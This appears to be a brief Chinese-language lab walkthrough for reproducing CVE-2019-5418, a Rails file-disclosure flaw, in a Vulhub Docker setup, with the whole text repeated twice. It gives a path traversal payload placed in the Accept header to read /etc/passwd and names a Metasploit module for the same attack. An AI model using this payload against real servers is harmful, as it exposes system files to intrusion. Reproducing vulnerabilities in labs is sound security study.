Vulhub環境:
啓動目錄/rails/CVE-2019-5418,啓動命令:docker-compose up -d
隨後訪問http://you ip:3000
出現歡迎界面,然後訪問/robots目錄
Burp抓取該目錄的數據包,修改accept爲如下payload:
../../../../../../etc/passwd
Msf的use auxiliary/gather/rails_doubletap_file_read 模塊也可以攻擊
Vulhub環境:
啓動目錄/rails/CVE-2019-5418,啓動命令:docker-compose up -d
隨後訪問http://you ip:3000
出現歡迎界面,然後訪問/robots目錄
Burp抓取該目錄的數據包,修改accept爲如下payload:
../../../../../../etc/passwd
Msf的use auxiliary/gather/rails_doubletap_file_read 模塊也可以攻擊